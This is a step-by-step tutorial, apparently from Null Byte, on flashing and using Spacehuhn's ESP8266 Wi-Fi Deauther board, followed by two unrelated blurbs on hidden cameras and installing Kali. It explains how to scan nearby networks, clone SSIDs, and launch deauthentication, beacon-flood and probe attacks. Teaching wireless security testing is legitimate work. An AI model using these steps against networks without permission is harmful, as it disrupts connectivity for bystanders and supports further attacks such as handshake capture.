The Wi-Fi Deauther program can be run on nearly any ESP8266-based development board, including the NodeMCU, the D1 Mini, and others. These boards are cheap and can be as low as $2 to $6 depending on the manufacturer, and they allow anyone to get started hacking Wi-Fi.

While the cheapest boards are a good start, they lack a few things that make the Deauther a lot more useful. The simplest, cheapest boards have no screen, no buttons or controls, and no indicators to know what’s going on just by looking at the device. To control it, you’d need to log in to the web interface or buy and attach the hardware yourself.

The ESP8266 Deauther Board

Fortunately, Spacehuhn partnered with a board producer to create a custom ESP8266-based development board for security projects. This version of the ESP8266 features options that can be explored through a (somewhat fragile) selector switch that scrolls through menu options on an OLED display. The board allows any external antenna to be mounted on it, features an RGB LED for showing what mode the device is in, and connects either to a LiPo battery or USB power source directly.

Image by Kody/Null Byte

Upon powering up the custom board, it’s easy to scroll through the options to operate the board by hand. It’s a leg up on even the Raspberry Pi, which tells you almost nothing just by plugging it in without a screen. With only a battery pack, you can power the Deauther board, select a target, and launch an attack without needing a separate device to view or control it, as is often required with devices like the Pi Zero W.

Due to reliability issues with cheap suppliers and the numerous hardware benefits the official board offers, I highly recommend the official DSTIKE version for anyone wanting to try this project, which costs $12. There are some copycat versions available on Amazon, but they usually cost more and, again, could come from cheap suppliers. Also, while it’s possible to do this with a cheap NodeMCU, you’ll need a second device to log in and control the device.

What You’ll Need

To get started with the Wi-Fi Deauther project, you’ll need an ESP8266-based development board. The best way to follow the project and stay involved with updates to the software is to purchase the original board design on Tindie. This project should work with the following Spacehuhn-designed boards.

While all of these boards are unique and come with different hardware, all are based on the ESP8266, and any will work with the Wi-Fi Deauther program. Also, buying them supports the researcher behind the program, and it gives you access to extended hardware features that make the board more useful without needing a second device to control it.

While there are rip-offs of the designs available for less or even more, they often don’t use the same hardware or use cheaper manufacturing techniques, leading to frustrating failures that add up over time.

Real and fake Deauther boards for comparison. Image via Spacehuhn’s GitHub

If you’re on a budget and don’t mind using a device without a screen, you can do this project for cheap with either of the following boards. You can read more about the kinds of boards that will work for this project on Spacehuhn’s GitHub page.

There are several versions of the NodeMCU, but only the version 1.0 fits nicely on a breadboard. The V3 is not as good for this project. Image via Spacehuhn’s GitHub

Aside from the board, you’ll need a computer or smartphone with Wi-Fi to join the network that the board creates. You’ll also need a Micro-USB cable to supply power, and a power source such as a battery to plug it into. Once you have a computer or smartphone to control the Deauther, the Micro-USB cable and power source, and a network you have permission to test the Deauther on, you’re ready to begin.

Step 1: Get Your Board Ready

If you have the original board, it should come preloaded with the latest Wi-Fi Deauther program. You should be able to power on the board by plugging it into a USB power source and using the screen and selector switch to scroll through the menu options directly. Be careful with the selector switch, though, as it has a tendency to become unsoldered from the board and requires some basic knowledge of soldering to reattach.

Skip to Step 2 if you’re using the original Deauther board. If not, you’ll need to take a few steps to get set up. First, download and install the Arduino IDE. Once you’ve done that, you’ll need to click on the "Arduino" or "File" drop-down menu, then select "Preferences" from the menu that appears. Next, click the dual-window icon next to the Additional Boards Manager URLs field, then paste the following URLs, one each to a line. Once that’s complete, click "OK" to save, then "OK" again to close the menu.

http://arduino.esp8266.com/stable/package_esp8266com_index.json
http://phpsecu.re/esp8266/package_deauther_index.json

Next, you’ll need to add the board you’re using to the Boards Manager. To do this, you’ll need to click on "Tools," then hover over the "Board" section to see the drop-down list of supported boards. At the top, click "Boards Manager" to open the window that will allow us to add more boards.

When the Boards Manager window opens, type "esp8266" into the search bar. Select and install both "arduino-esp8266-deauther" and "esp8266" to add support for the board to your Arduino IDE.

Once that is done, you should be ready to program your board. Plug your ESP8266-based board into your computer. When you click on "Tools," you should see the correct port auto-selected, but if not, click on the "Board" option and select the correct one under the Deauther Modules section.

If you’re using a bad cable, the port may not show up, so if you don’t see anything after you’ve completed the other steps, try another cable first. If you still don’t see anything, there’s a good chance you need to install a driver by following these instructions, which is common when using cheap knockoff boards.

Now, let’s download the code onto the ESP8266-based Deauther board. Clone the repository with the command below, and then move the "esp8266_deauther" folder into your "Arduino" folder.

~# git clone https://github.com/spacehuhn/esp8266_deauther.git

When it’s done downloading, open the "esp8266_deauther.ino" file with Arduino from inside the "Arduino" folder. Check your upload settings to make sure your board is properly selected, and press upload to send the program to the ESP8266 device!

Step 2: Look for the Control Access Point

Once your Wi-Fi Deauther board is powered, you shouldn’t need a screen to interact with it. While it’s convenient to have a display to see what’s going on, we can rely on the web interface to control the ESP8266 device as well.

These chips are amazing because they can be put into many Wi-Fi modes, with the ability to join or even become their own Wi-Fi network. If you look on a smartphone or computer, you should see a Wi-Fi network nearby named "pwned." This is a network being created by our Deauther board!

To access it, connect to the Wi-Fi network and enter the password "deauther" to join. Then, in a browser window, you can navigate to the default IP address of 192.168.4.1 or simply type deauth.me to access the web interface the Deauther board is creating.

Now, agree to the notice that appears advising you not to do anything bad with this project. Once you agree, you’ll have access to the control interface for the device.

Step 3: Perform a Scan of the Area

First, let’s take a scan of the area around us. The first page you’ll find yourself on is the "Scan" page, which breaks down results into a few easy-to-understand categories. First, there are access points. This will give you a list of every device advertising a Wi-Fi network in range.

Further down the list, you’ll see devices that are connected to a network, as well as which network they are connected to. You can select the "Add" button to save a particular device or network to your target list. Here, we’ll select "spot 2.4 ghz" as the network we want to target.

Once you’ve selected a network to target, we can move on to the "SSIDs" menu by clicking on the menu shortcut in the top left of the screen.

Step 4: Select Target Networks

In the "SSIDs" section, we’ll be able to clone networks, create fake networks, or simply Rickroll everyone.

The top field is for specifying any fake network we want to create. This includes the SSID, or network name, whether or not the network uses WPA security, and how many networks you want to create.

If you selected an access point before, you can click "Clone Selected APs" to generate clones of the targeted network. There is also a module to generate random SSIDs, including several that are just the lines to "Never Gonna Give You Up."

In the image below, we cloned the network many times, making it very hard to find the correct network.

Step 5: Launch an Attack

Now, let’s check out the attacks we can launch in the "Attacks" section of the menu. Here, we can see three primary kinds of attacks.

  • Deauth: This will attack any network in range, disconnecting devices from it until you disable the attack. It’s worth mentioning that you are connected to the board via Wi-Fi, which makes it likely that you may unintentionally prevent yourself from connecting to the board to turn it off. If you find yourself disconnected and can’t get back in, you may need to unplug the board to get it to stop.
  • Beacon: This attack will create up to a thousand fake networks, either cloning nearby networks or creating entirely fake ones from scratch.
  • Probe: Here, the board will send probe requests asking for a network name that’s in the list you specify. This will confuse some Wi-Fi trackers and also sometimes cause Wi-Fi attack tools to create fake networks in response to the network names contained in the probe requests.

To begin the deauthentication attack, make sure you are somewhere where the only networks that are in range are ones you have permission to attack. Once you are, click the "Start" button next to the "Deauth" attack. When you feel the Wi-Fi devices in your local area have had enough punishment, click "Stop" to end the attack.

The original Wi-Fi Deauther board also comes with the ability to add an external antenna. By doing so, it’s possible to extend or change the range of the device by adding a directional antenna.

Step 6: Customize Your Settings

Now that we’ve explored the main attacks, we can also configure the board via the "Settings" tab on the top left of the screen. Clicking on it will bring up a menu page allowing you to do things like change the name of the network used to communicate with the board, change the password, and change the channel the device broadcasts its network on.

Here, you’ll also find an option to create a "Hidden" network, which might seem more stealthy to connect to. In fact, any device you connect to a hidden network will start calling out that network name any time the Wi-Fi is left on, making your phone more trackable.

The reason devices that have connected to a hidden network keep calling out for it is that they know the network is not broadcasting its name, so it’s up to your device to keep asking whether it is nearby.

You can customize settings as much as you like here, but be careful not to disable the Wi-Fi portal and the serial connection at the same time. Doing so will leave you with no way to communicate with the board, so make sure you leave at least one enabled to allow you to get back in.

Once you update your password and the name of your command-and-control Wi-Fi network, you’re ready to use the Wi-Fi Deauther anywhere, from any device. After making any changes to the menu or any other settings, make sure to press "Save" and "Reload" to apply the changes you made.

Microcontrollers Are Cheap, Efficient Cyber Weapons

The Raspberry Pi was revolutionary in giving access to powerful hacking tools to anyone who can afford a $35 board. With the Wi-Fi Deauther board, the boundaries of what can be done with low-cost Wi-Fi hardware have been pushed even further than before.

While microcontrollers don’t offer a full operating system to work with like a Raspberry Pi, the powerful attacks they’re capable of on their own make them more than worth checking out. While the Wi-Fi Deauther board can’t capture the numerous WPA handshakes it generates from nearby networks while in operation by itself, it’s a perfect companion tool for capturing WPA handshakes in Kali for later cracking.

I hope you enjoyed this guide to the Wi-Fi Deauther project! If you have any questions about this tutorial on the Wi-Fi Deauther board, leave a comment below, and feel free to reach me on Twitter @KodyKinzie.

Detecting Hidden Cameras

Microphones and cameras can be hidden in all kinds of places to spy on unsuspecting people. In most places it is illegal for someone to record you without informing you accordingly, but that does not always mean you are not being recorded. If you have the feeling that you are being recorded, carry out a thorough physical search and use the technology available to you to detect hidden cameras and microphones.

Installing and Setting Up Kali Linux

Kali Linux is a popular tool for penetration testing and security testing. Here you will learn how to install it! Installing Kali Linux on the hard drive: First, download Kali Linux for your PC. You can then use a program such as "Etcher" to write the ISO to a USB stick. Then boot from this stick and […]